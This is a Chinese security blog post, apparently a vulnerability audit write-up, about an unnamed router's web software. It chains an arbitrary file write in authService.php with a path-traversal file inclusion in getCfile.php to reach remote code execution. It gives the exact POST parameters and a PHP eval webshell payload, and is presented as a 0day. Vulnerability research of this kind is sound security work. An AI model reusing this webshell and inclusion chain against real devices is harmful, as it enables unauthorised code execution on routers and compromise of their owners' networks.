01
审计步骤
(一)查找写入文件函数:
自动化审计,在这个/auth_pi/authService.php文件下发现file_put_contents函数可控,跟进该文件。
/auth_pi/authService.php文件的set_authAction方法。在76行的提醒语句也说明了该info文件在user_auth目录下,而且也未对userName进行安全过滤,这里可以任意路径创建文件。
而P方法存在于/mvc/lib/core.function.php的类里面,是用来接收POST传参。
这里注意:包含路径是data下的
利用方式:
1:post请求2:请求参数a=set_auth3:参数为userName、auth
payload:
userName=tr1&auth=<?php%20@eval($_POST['w']);?>
(二)查找文件包含函数:
自动化审计,在这个/local/auth/php/getCfile.php文件下发现include 函数可控,跟进该文件。
这个文件通过post方式传参但是并没有对cf参数进行安全过滤
利用方式:
1:post请求2:必须存在tmp/app_auth/cfile目录或者自己创建3:参数为cf、&field=1
payload:
cf=../../../data/tr.info&field=1&w=phpinfo();说明:这里的文件需要刚刚写文件的文件名
【火线短视频精选】
【周度激励】2021.8.16 ~ 2021.8.22
【相关精选文章】
【招人专区】
本文始发于微信公众号(火线Zone):某路由审计0day之文件包含-2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论